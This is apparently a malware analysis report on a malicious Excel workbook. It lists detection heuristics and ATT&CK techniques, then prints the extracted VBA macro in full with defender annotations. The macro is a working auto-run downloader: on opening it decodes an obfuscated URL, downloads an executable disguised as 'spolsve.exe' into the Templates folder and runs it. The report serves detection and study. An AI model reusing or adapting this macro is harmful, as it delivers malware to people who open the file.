MALICIOUS
388
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
The sample contains VBA macros that use WScript.Shell and URLDownloadToFile to download and execute a payload. The Workbook_Open subroutine runs automatically when the document is opened, indicating an automated execution flow. The script assembles an obfuscated URL, downloads the file it points to into the user's 'Templates' folder, and then opens that file, strongly suggesting it acts as a downloader for further malicious activity.
Heuristics 9
-
ClamAV: Xls.Dropper.Agent-9310609-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Dropper.Agent-9310609-0
-
Reference to URLDownloadToFile API — critical — SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API
-
VBA macros detected — medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
WScript.Shell usage — critical — OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
Set euelis = CreateObject("WScript.Shell") itelro = euelis.SpecialFolders("Templates") -
URLDownloadToFile in VBA — critical — OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA. Matched line in script:
DeleteUrlCacheEntry (zzz) URLDownloadToFile 0, zzz, eee, 0, 0 -
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set euelis = CreateObject("WScript.Shell") itelro = euelis.SpecialFolders("Templates") -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where no visible source is available.
-
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Sub Workbook_Open() Dim euelis As Object -
Reference to Windows Script Host — high — SC_STR_WSCRIPT: Reference to Windows Script Host
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4328 bytes |

SHA-256: a56a21ce48f4d72232cb3906936e496e5831347e200144cf9f0e574c6e364691
Preview script — first 1,000 lines of the extracted script:
' Module "ThisWorkbook" (the workbook's own document module), exported with
' its VB_* attribute header. VB_PredeclaredId = True and VB_Exposed = True
' are the normal values for a document module and are not suspicious by
' themselves; the malicious behaviour is in Workbook_Open below.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' WinINet import (ANSI variant) used by Workbook_Open to drop the cached copy
' of the download URL before it is fetched. Declared Private, so it is only
' callable from this module; PtrSafe marks the declaration as 64-bit aware.
' A document module importing from Wininet.dll is itself a good static
' detection signal.
Private Declare PtrSafe Function DeleteUrlCacheEntry Lib "Wininet.dll" Alias _
"DeleteUrlCacheEntryA" (ByVal lpszUrlName As String) As Long
' Auto-exec entry point: VBA runs Workbook_Open as soon as the workbook is
' opened with macros enabled, so no further user interaction is required.
' The routine is a three-step downloader: resolve a drop directory, download
' a file from an obfuscated URL into it, then open that file.
' Detection notes (defender view): Excel instantiating WScript.Shell and
' Shell.Application, Excel calling urlmon!URLDownloadToFile, and Excel
' launching an executable from the user's Templates folder are each
' individually suspicious and together characterise this sample.
Sub Workbook_Open()
Dim euelis As Object
Dim itelro As String
' WScript.Shell is used only to resolve the user's "Templates" special folder,
' which becomes the directory the payload is written to.
Set euelis = CreateObject("WScript.Shell")
itelro = euelis.SpecialFolders("Templates")
' bbb, ccc, ddd, ggg and iii are declared (and ggg assigned) but never used
' elsewhere in this routine; presumably junk statements added to vary the
' macro's appearance.
Dim bbb
Dim ccc
Dim ddd
Dim eee
Dim fff
Dim ggg As Integer
Dim hhh
Dim iii
ggg = 1
' An MSXML HTTP object is created but hhh is never referenced again in this
' module; presumably a decoy or a leftover from another variant.
Set hhh = CreateObject("microsoft.xmlhttp")
Dim dfefef
' String obfuscation scheme: every character is produced by Chr() of an
' integer expression (a decimal literal divided by a hex literal, or a
' negative literal plus a hex literal), so no readable ProgID, path or URL
' appears in the source. Evaluating this expression yields the ProgID
' "Shell.Application".
dfefef = Chr(585648 / CLng(&H1B90)) & Chr(602784 / CLng(&H16A4)) & Chr(305020 / CLng(&HBCC)) & Chr(15228 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(20930 / CLng(&H1C7)) & Chr(560755 / CLng(&H21B3)) & Chr(418432 / CLng(&HE98)) & Chr(-8603 + CLng(&H220B)) & Chr(1025676 / CLng(&H2519)) & Chr(551250 / CLng(&H1482)) & Chr(53064 / CLng(&H218)) & Chr(454736 / CLng(&H1250)) & Chr(722448 / CLng(&H1854)) & Chr(277095 / CLng(&HA4F)) & Chr(921189 / CLng(&H206B)) & Chr(648230 / CLng(&H1705))
' fff is a Shell.Application object; its Open method is what launches the
' downloaded file at the end of the routine.
Set fff = CreateObject(dfefef)
' Destination path: the Templates folder followed by an obfuscated suffix
' that decodes to "\spolsve.exe" - presumably chosen to resemble a Windows
' system binary name.
eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))
' zzz is the download URL, assembled from about 70 obfuscated characters over
' the next five statements; the first eight decode to "https://" (host not
' transcribed here). zzz is never Dim'd: this module has no Option Explicit
' (only Module1 does), so VBA creates it implicitly as a Variant.
zzz = Chr(733824 / CLng(&H1B90)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8613 + CLng(&H220B)) & Chr(949700 / CLng(&H2519)) & Chr(236250 / CLng(&H1482)) & Chr(53064 / CLng(&H218)) & Chr(520368 / CLng(&H1250)) & Chr(678852 / CLng(&H1854)) & Chr(121394 / CLng(&HA4F))
zzz = zzz & Chr(846498 / CLng(&H206B)) & Chr(671802 / CLng(&H1705)) & Chr(-9064 + CLng(&H2397)) & Chr(827288 / CLng(&H1B28)) & Chr(273280 / CLng(&H988)) & Chr(47925 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(113410 / CLng(&H407)) & Chr(-2730 + CLng(&HB1E)) & Chr(298859 / CLng(&HB8F)) & Chr(331210 / CLng(&HBC3)) & Chr(1136684 / CLng(&H2647)) & Chr(-2737 + CLng(&HAE0)) & Chr(188964 / CLng(&H65D)) & Chr(426608 / CLng(&H1006))
zzz = zzz & Chr(719928 / CLng(&H1BD8)) & Chr(-6224 + CLng(&H18BD)) & Chr(187961 / CLng(&H745)) & Chr(92920 / CLng(&H328)) & Chr(425726 / CLng(&H2362)) & Chr(777447 / CLng(&H1EAD)) & Chr(321678 / CLng(&HB52)) & Chr(694980 / CLng(&H18AE)) & Chr(-4171 + CLng(&H10BE)) & Chr(656487 / CLng(&H15EB)) & Chr(986904 / CLng(&H23B2)) & Chr(26332 / CLng(&HE3)) & Chr(962115 / CLng(&H23CB)) & Chr(745800 / CLng(&H1A7C)) & Chr(529214 / CLng(&H1412))
zzz = zzz & Chr(406640 / CLng(&HDD0)) & Chr(-2597 + CLng(&HA8A)) & Chr(278046 / CLng(&H987)) & Chr(71980 / CLng(&H262)) & Chr(383355 / CLng(&HE43)) & Chr(154242 / CLng(&H616)) & Chr(259974 / CLng(&HA0E)) & Chr(-5307 + CLng(&H152E)) & Chr(441142 / CLng(&H24AA)) & Chr(592254 / CLng(&H13C6)) & Chr(120400 / CLng(&H433)) & Chr(496476 / CLng(&H11F5)) & Chr(661782 / CLng(&H174A)) & Chr(-92 + CLng(&HBD)) & Chr(-641 + CLng(&H2E5))
zzz = zzz & Chr(-3271 + CLng(&HCF6)) & Chr(348 / CLng(&H3)) & Chr(716348 / CLng(&H19AC)) & Chr(-8163 + CLng(&H2053)) & Chr(88320 / CLng(&H780)) & Chr(526988 / CLng(&H11BF)) & Chr(180120 / CLng(&H5DD)) & Chr(1077524 / CLng(&H2449))
' Purge any WinINet cache entry for the URL, presumably so the following
' download fetches a fresh copy from the server instead of a stale local one.
DeleteUrlCacheEntry (zzz)
' Download the URL to the Templates-folder path. URLDownloadToFile is declared
' in Module1 (see below). Its return value is discarded, so the routine
' carries on even if the download failed. Network telemetry from the Excel
' process itself is the detection hook here.
URLDownloadToFile 0, zzz, eee, 0, 0
' Launch the dropped file through Shell.Application.Open (a child process of
' Excel started from the Templates folder). If the download failed and the
' file does not exist, nothing is launched.
fff.Open (eee)
End Sub
' Module "Sheet1": a worksheet document module. Only its exported attribute
' header is present in this extraction; it contains no procedures.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module "Module1": a standard module whose only content is the urlmon import.
Attribute VB_Name = "Module1"
' Option Explicit is set in this module only; ThisWorkbook has none, which is
' why Workbook_Open can use the undeclared variable zzz.
Option Explicit
' urlmon!URLDownloadToFile (ANSI variant). The Declare carries no Private
' keyword, so it is visible project-wide - this is how
' ThisWorkbook.Workbook_Open calls it. The caller passes 0 for pCaller,
' dwReserved and lpfnCB and ignores the Long return value.
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr) As Long
|
|||